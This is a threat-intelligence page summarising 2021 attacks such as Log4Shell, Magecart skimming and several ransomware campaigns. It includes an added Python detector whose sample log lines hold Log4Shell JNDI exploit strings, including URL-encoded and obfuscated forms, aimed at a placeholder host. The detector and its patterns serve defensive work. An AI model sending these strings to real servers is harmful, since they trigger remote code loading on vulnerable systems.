The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as run exposure checks on your endpoint devices/servers, which can help identify successful payload delivery and compromise via the vulnerability in question.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness

About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports, hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles

Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Khonsari Ransomware & Log4Shell

December 21, 2021

Industry: N/A | Level: Tactical | Source: CadoSecurity

The Khonsari ransomware family has been observed exploiting the CVE-2021-44228/Log4Shell vulnerability to target Windows servers. The malware executable “groenhuyzen.exe” is dropped through the JNDI class exploit. The malware’s functionality is straightforward: at only 12 KB, it enumerates and encrypts (appending the extension .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted, including Documents, Videos, Pictures, Downloads, and Desktop.

  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

CVE-2021-44228 / Log4Shell Vulnerability

December 10, 2021

Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List

A zero-day exploit has been identified for the Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1, with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.

The exploit requires three components: a vulnerable log4j version, any protocol that enables the attacker to send the exploit string, and a log statement that logs the string from the request.

Mitigation is available through an update; affected users are recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats taking advantage of the widespread vulnerability: Kinsing (cryptocurrency miner), Mirai malware, Cobalt Strike, a new unidentified ransomware strain, and likely others yet to be identified.
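
Added example, not code from the Anvilogic report or any of its sources: a small Python detector for the third component above, the exploit string that lands in a log statement. It URL-decodes each log line and collapses nested lookups such as ${lower:j} or ${::-l} before matching on ${jndi:, so forms that a literal search for the string would miss are still flagged. The log lines and the example.invalid host are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report); example.invalid is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 404 "curl/7.79"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://example.invalid/c}"',
    '10.0.0.13 - - "GET /search?q=jndi HTTP/1.1" 200 "Mozilla/5.0"',
]

# Innermost log4j lookups that evaluate to plain text: ${lower:x}, ${upper:x} and the
# ${::-x} default-value form. Each is replaced by x; case is handled by lowercasing later.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}")

# The string log4j would evaluate: "${jndi:" (whitespace tolerated around the key).
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(text):
    """URL-decode and collapse nested lookups until the text stops changing."""
    text = unquote(unquote(text))  # tolerate single or double URL encoding
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text.lower()


def is_log4shell_probe(line):
    """True if the line, once normalized, contains a JNDI lookup log4j would resolve."""
    return _JNDI.search(normalize(line)) is not None


def scan_logs(lines):
    """Return the indexes of lines that carry a JNDI lookup string."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan_logs(SAMPLE_LOGS):
        print("suspect line", i, SAMPLE_LOGS[i])
```

A hit only says the string reached a log statement; pair it with the version exposure check (2.0-beta9 through 2.14.1) on the receiving host to decide whether it could have been evaluated.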

Magecart Abuses Google Tag Manager

December 01, 2021

Industry: eCommerce | Level: Strategic | Source: GeminiAdvisory

The Magecart threat actor group has abused the Google Tag Manager (GTM) service by selectively adding malicious JavaScript within GTM containers. The GTM service was intended to give web authors the capability to update measurement codes and other code fragments. Abused GTM containers execute the embedded JavaScript when a browser loads the link to a container, collecting unsuspecting buyers’ information through additional payment forms and exfiltrating the data to a remote collection server. These findings are reported by Gemini Advisory, a Recorded Future company, which has been observing the threat since February 4th, 2021. Three hundred and sixteen ecommerce sites were compromised with infected containers, resulting in at least 88,000 payment card records posted for sale on dark web markets.

ANSSI Alerts of Nobelium Targeting French Organizations

December 01, 2021

Industry: Diplomatic | Level: Strategic | Source: ANSSI

The French national cyber-security agency, ANSSI, raised an alert detailing Nobelium phishing campaigns directed at French entities. Observation of the campaign began in February 2021, with a noticed escalation in May. French email accounts are compromised and then used to send weaponized emails to foreign institutions in the diplomatic sector. The threat group is utilizing various hosting methods, mainly OVH SAS, Hydra Communications Ltd, M247 Ltd and 12 additional observed hosting providers.

NSO Spyware Compromises US State Department Employees’ Phones

December 01, 2021

Industry: Government | Level: Strategic | Source: Reuters

Apple Inc. has informed at least nine US Department of State employees that their iPhones had been compromised by NSO Pegasus spyware. Impacted officials were all either based in Uganda or focused on matters concerning the East African country, as shared by two Reuters sources. The compromises occurred within the last several months.

RTF Template Injection

December 01, 2021

Industry: Energy (Deepwater) & Government | Level: Tactical | Source: ProofPoint

Proofpoint has observed increased usage of RTF template injection by threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021, with files publicly identified on April 5th. Template injection enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique. The APT groups DoNot Team and TA423 are both associated with targeting Malaysia’s deepwater energy exploration, while the APT actor Gamaredon targeted the Ukrainian government.

  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Abuse EQNEDT32.EXE CVE-2017-11882

Microsoft Excel (XLL) Leads to RedLine Info-Stealer

December 01, 2021

Industry: N/A | Level: Tactical | Source: BleepingComputer

Threat actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install the RedLine information stealer. Malicious links are hosted on Google Drive and download an XLL, which BleepingComputer describes as “an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32, which extracts the wget.exe program to download the RedLine binary, saving it as %UserProfile%\JavaBridge32.exe. Once downloaded, an autorun registry entry launches the malware and enables persistence.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • regsvr32 Execution
    • Rundll32 Command Line
    • Invoke-WebRequest Command

Yanluowang Ransomware Linked to Thieflock Affiliate

December 01, 2021

Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec

The Yanluowang ransomware group, active since at least August 2021, has been targeting US corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Thieflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances, from Thieflock to the Yanluowang ransomware family. Notable observed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, AdFind for reconnaissance, and various other credential-stealing tools.

  • Anvilogic Scenario: Yanluowang Ransomware – Behaviors
  • Anvilogic Use Cases:
    • RDP Enabled
    • Adfind Execution
    • pypykatz commands

BlackByte Ransomware from RedCanary

December 01, 2021

Industry: N/A | Level: Tactical | Source: RedCanary

RedCanary presented research from a BlackByte ransomware incident response engagement with Kroll. The attack sequence covered initial access via ProxyShell and a web shell, post-exploitation with Cobalt Strike, impairing defenses through process monitoring, Windows Defender, and firewall modifications, and finally ransomware deployment and file exfiltration.

  • Anvilogic Scenario: BlackByte Behaviors

Cuba Ransomware

December 01, 2021

Industry: Critical Infrastructure | Level: Tactical | Source: FBI

The FBI released a flash report on Cuba ransomware, which, based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to the Cuba ransomware. Threat actors utilize phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. The threat actors also employ many legitimate Windows services, such as PowerShell and PsExec, in addition to leveraging Windows admin privileges to execute their ransomware.

  • Anvilogic Scenario: Hancitor & Cuba Ransomware
  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • PSexec Service Creation
    • Remote Admin Tools